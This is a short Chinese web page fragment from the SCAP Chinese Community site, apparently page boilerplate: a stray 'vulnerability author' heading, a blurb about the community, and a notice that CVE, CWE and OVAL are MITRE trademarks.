- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站